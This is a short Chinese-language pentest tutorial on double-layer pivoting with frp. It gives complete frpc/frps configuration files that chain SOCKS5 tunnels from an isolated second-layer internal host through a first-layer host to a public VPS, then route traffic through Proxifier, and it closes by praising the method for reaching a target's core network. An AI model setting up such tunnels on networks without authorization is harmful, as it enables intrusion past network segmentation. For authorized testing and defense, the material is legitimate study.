使用场景

适用于内网渗透时存在多层内网的情况，可以将二层不出网的内网代理到外层内网，再通过端口转发方式代理到公网，实现将二层内网转发到公网的目的。

关键词

两次转发，代理链

具体配置

二层内网主机（45.xx.xx.178）

//frpc.ini

[common]
server_addr = 45.xx.xx.122  //一层内网主机地址
server_port = 11001  //一层内网主机监听端口
token = 1q2w3e
protocol = tcp

[socks5]
type=tcp
remote_port = 12001
plugin = socks5

一层内网主机（45.xx.xx.122）

//frps.ini

[common]
bind_addr = 0.0.0.0
bind_port = 11001
token = 1q2w3e
protocol = tcp

//frpc.ini

[common]
server_addr = 81.xx.xx.108  //公网VPS地址
server_port = 11002  //公网VPS监听端口
token = 1q2w3e
protocol = tcp

[socks5]
type=tcp
remote_port = 12002
plugin = socks5

公网主机（81.xx.xx.108）

//frps.ini

[common]
bind_addr = 0.0.0.0
bind_port = 11002
token = 1q2w3e
protocol = tcp

Proxifier配置

按下图所示配置代理链：

规则中使用代理链进行代理：

测试结果

代理连接成功：

当前IP为二层主机IP：

总结

在遇到多层内网的情况下，借助双层代理能够很好地进行目标核心内网的渗透，获取更多成果，是内网渗透中非常实用的技巧。